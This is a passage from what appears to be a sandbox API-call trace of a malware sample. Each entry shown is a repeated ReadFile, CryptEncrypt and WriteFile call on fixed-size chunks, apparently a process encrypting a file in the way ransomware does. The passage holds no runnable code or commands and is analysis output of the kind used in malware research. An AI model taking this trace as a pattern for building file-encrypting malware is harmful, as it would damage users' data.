pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.128] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.128] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.128] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.128] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.129] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.129] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.129] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.129] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.129] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.130] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.130] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.130] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.130] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.130] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.131] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.131] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.131] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.131] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.131] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.132] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.132] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.132] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.132] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.132] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.132] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.133] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.133] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.133] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.133] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.134] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.134] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.134] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.134] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.134] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.134] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.135] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.135] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.135] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.135] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.137] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.137] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.137] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, 